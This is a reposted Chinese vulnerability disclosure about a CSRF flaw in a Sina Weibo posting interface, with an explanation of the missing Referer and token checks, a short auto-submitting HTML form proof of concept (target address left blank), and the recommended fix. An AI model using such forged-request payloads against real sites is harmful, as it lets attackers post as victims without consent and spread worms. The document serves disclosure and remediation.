• 选择风格
  • 加入收藏
  • 繁體中文
  • 网站地图
    • 当前位置:首页 >> 网络通讯 >> 网络安全 >> 内容

    新浪微博某处CSRF漏洞

    时间:2013/4/19 12:09:00 作者:平凡之路 来源:xuhantao.com 浏览:

    新浪微博某处CSRF漏洞,可能导致蠕虫蔓延,涛涛电脑知识网,在未经用户同意的情况下发布微博
    详细说明:在接受POST和GET的信息的时候,未对POST来路(Referer)进行验证,同时也没有在POST的信息中加token验证信息的正确性,导致漏洞产生。
    漏洞地址:

     
    <html>
    <body>
    <form id="imlonghao" name="imlonghao" action="" method="post">
    <input type="text" name="content" value=" " />
    <input type="text" name="_t" value="0" />
    <input type="submit" value="submit" />
    </form>
    <script>
           document.imlonghao.submit();
    </script>
    </body>
    </html>
     
     
    接口返回信息会报错误,www.xuhantao.com,但是不影响
     
    修复方案:
     
    检查POST来路Referer
    在POST的信息中加token
    作者  imlonghao

  • 上一篇:东软集团某子站SQLROOT注入+后台
  • 下一篇:记事狗微博V3.6.1 Build 20120718后台拿shell
    • 相关文章
    • 没有相关文章
  • 徐汉涛(www.xuhantao.com) © 2024 版权所有 All Rights Reserved.
  • 部分内容来自网络,如有侵权请联系站长尽快处理 站长QQ:965898558(广告及站内业务受理) 网站备案号:蒙ICP备15000590号-1